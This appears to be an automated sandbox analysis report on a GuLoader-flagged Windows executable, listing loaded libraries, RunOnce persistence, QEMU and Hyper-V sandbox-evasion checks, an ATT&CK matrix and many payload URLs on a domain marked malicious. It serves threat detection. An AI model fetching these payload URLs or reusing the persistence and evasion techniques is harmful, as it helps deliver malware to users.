      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: WEAREX_IHRACAT.exeReversingLabs: Detection: 57%
      Source: WEAREX_IHRACAT.exeVirustotal: Detection: 70%
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile read: C:\Users\user\Desktop\WEAREX_IHRACAT.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\WEAREX_IHRACAT.exe "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess created: C:\Users\user\Desktop\WEAREX_IHRACAT.exe "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess created: C:\Users\user\Desktop\WEAREX_IHRACAT.exe "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"Jump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: msi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: msi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile written: C:\Windows\Fonts\logorrheic.iniJump to behavior
      Source: Binary string: mshtml.pdb source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.6650157112.0000000001721000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.2455393389.00000000031C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile created: C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exeJump to dropped file
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile created: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AaregangJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AaregangJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AaregangJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce AaregangJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeAPI/Special instruction interceptor: Address: 3B9064C
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeAPI/Special instruction interceptor: Address: 20F064C
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2454702196.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 FILES\QEMU-GA\QEMU-GA.EXEP
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2458782228.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653716052.0000000002A00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2454702196.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEN
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe TID: 5580Thread sleep count: 39 > 30Jump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe TID: 5580Thread sleep time: -390000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2454702196.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeN
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2933900374.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3144180833.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566595182.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653418336.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620738937.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410480994.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093636332.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197529994.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988266502.0000000002897000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6199353892.0000000002897000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6093636332.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620738937.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410480994.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988266502.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6305027978.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6199353892.0000000002866000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653418336.0000000002867000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515602395.0000000002866000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2454702196.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 Files\Qemu-ga\qemu-ga.exep
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2458782228.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653716052.0000000002A00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: WEAREX_IHRACAT.exe, 00000000.00000002.2459409919.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4396
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeAPI call chain: ExitProcess graph end nodegraph_0-4392
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeProcess created: C:\Users\user\Desktop\WEAREX_IHRACAT.exe "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"Jump to behavior
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      Registry Run Keys / Startup Folder      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping41
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading      		1
      Registry Run Keys / Startup Folder      		11
      Virtualization/Sandbox Evasion      		LSASS Memory11
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS13
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      WEAREX_IHRACAT.exe58%ReversingLabsWin32.Trojan.Guloader
      WEAREX_IHRACAT.exe70%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe58%ReversingLabsWin32.Trojan.Guloader
      C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      gitak.top23%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://gitak.top/dmAaHCQMI79.bin/A~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin5100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin)100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin6100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/9~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.bin6100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin0100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binM~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/100%Avira URL Cloudmalware
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      https://gitak.top/dmAaHCQMI79.binD100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binNJ100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bine~100%Avira URL Cloudmalware
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.bin100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binY~100%Avira URL Cloudmalware
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      https://gitak.top/W~100%Avira URL Cloudmalware
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%VirustotalBrowse
      https://gitak.top/dmAaHCQMI79.bin/o~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binR100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/Y~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binR100%Avira URL Cloudmalware
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
      https://gitak.top/dmAaHCQMI79.binX100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/K~v100%Avira URL Cloudmalware
      https://gitak.top/e~100%Avira URL Cloudmalware
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
      https://gitak.top/dmAaHCQMI79.binK100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin-~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binX100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bino~100%Avira URL Cloudmalware
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      https://gitak.top/dmAaHCQMI79.binA~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binK~v100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binD100%Avira URL Cloudmalware
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse
      https://gitak.top/dmAaHCQMI79.binf100%Avira URL Cloudmalware
      https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
      https://gitak.top/dmAaHCQMI79.bin9~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/M~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bince100%Avira URL Cloudmalware
      https://gitak.top/7~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binq100%Avira URL Cloudmalware
      https://gitak.top/A~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binW~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/7~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binz100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binl100%Avira URL Cloudmalware
      https://gitak.top/100%Avira URL Cloudmalware
      https://gitak.top/M~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin20%VirustotalBrowse
      https://gitak.top/dmAaHCQMI79.binc~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/e~100%Avira URL Cloudmalware
      http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
      https://gitak.top/dmAaHCQMI79.binMicrosoft100%Avira URL Cloudmalware
      https://gitak.top/K~v100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binl100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binz100%Avira URL Cloudmalware
      https://gitak.top/My100%Avira URL Cloudmalware
      https://gitak.top/Y~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin7~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/W~100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.bin/c~100%Avira URL Cloudmalware
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
      http://www.quovadis.bm00%Avira URL Cloudsafe
      https://gitak.top/dmAaHCQMI79.bin(100%Avira URL Cloudmalware
      https://gitak.top/dmAaHCQMI79.binAuthority100%Avira URL Cloudmalware
      https://gitak.top/o~100%Avira URL Cloudmalware
      https://gitak.top/9~100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      gitak.top
      		172.67.207.219
      		truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://gitak.top/dmAaHCQMI79.bintrue
      • 20%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://gitak.top/dmAaHCQMI79.bin/9~WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin6WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
